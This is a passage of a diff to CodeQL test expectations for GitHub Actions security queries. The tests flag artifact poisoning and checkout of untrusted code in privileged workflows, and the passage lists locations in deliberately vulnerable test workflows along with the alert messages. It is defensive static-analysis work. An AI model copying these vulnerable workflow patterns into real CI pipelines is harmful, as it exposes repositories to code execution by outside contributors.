Step: downloadBuildScan | semmle.label | Uses Step: downloadBuildScan | | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | semmle.label | ./gradlew buildScanPublishPrevious\n | subpaths -#select -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning11.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning12.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning21.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning22.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning31.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning32.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning33.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning34.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning41.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning42.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning71.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning81.yml:3:5:3:23 | pull_request_target | pull_request_target | -| .github/workflows/artifactpoisoning96.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning96.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning96.yml:18:14:18:24 | npm install | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning96.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning101.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/test18.yml:3:5:3:16 | workflow_run | workflow_run | -| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/test25.yml:2:3:2:14 | workflow_run | workflow_run | diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref index 4f8d2af04e8..2f71173a891 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref @@ -1,2 +1,2 @@ -Security/CWE-829/ArtifactPoisoningCritical.ql - +query: Security/CWE-829/ArtifactPoisoningCritical.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index c0c52e47f5b..ef09155ec63 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -1,3 +1,4 @@ +#select edges | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | Config | | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | Config | @@ -54,4 +55,3 @@ nodes | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | semmle.label | Uses Step: downloadBuildScan | | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | semmle.label | ./gradlew buildScanPublishPrevious\n | subpaths -#select diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref index 39548f27412..177e1b08095 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref @@ -1,2 +1,2 @@ -Security/CWE-829/ArtifactPoisoningMedium.ql - +query: Security/CWE-829/ArtifactPoisoningMedium.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref index 17a2059f7e9..4f3bbb90c2a 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref @@ -1,2 +1,2 @@ -experimental/Security/CWE-829/ArtifactPoisoningPathTraversal.ql - +query: experimental/Security/CWE-829/ArtifactPoisoningPathTraversal.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref b/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref index 8c9db66bf6b..ce9ebe84e53 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref @@ -1 +1,2 @@ -Security/CWE-829/UnpinnedActionsTag.ql +query: Security/CWE-829/UnpinnedActionsTag.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 52fcecfb9ed..6f478cfcb14 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -1,3 +1,43 @@ +#select +| .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | pull_request_target | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/label_trusted_checkout2.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:59:9:60:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:60:9:60:37 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | pull_request_target | +| .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test11.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test17.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test26.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:14:7:21:11 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test29.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target | edges | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | @@ -337,43 +377,3 @@ edges | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | | .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | | .github/workflows/workflow_run_untrusted_checkout_3.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_3.yml:16:9:18:31 | Uses Step | -#select -| .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | -| .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | pull_request_target | -| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | pull_request_target | -| .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/label_trusted_checkout2.yml:2:3:2:21 | pull_request_target | pull_request_target | -| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | -| 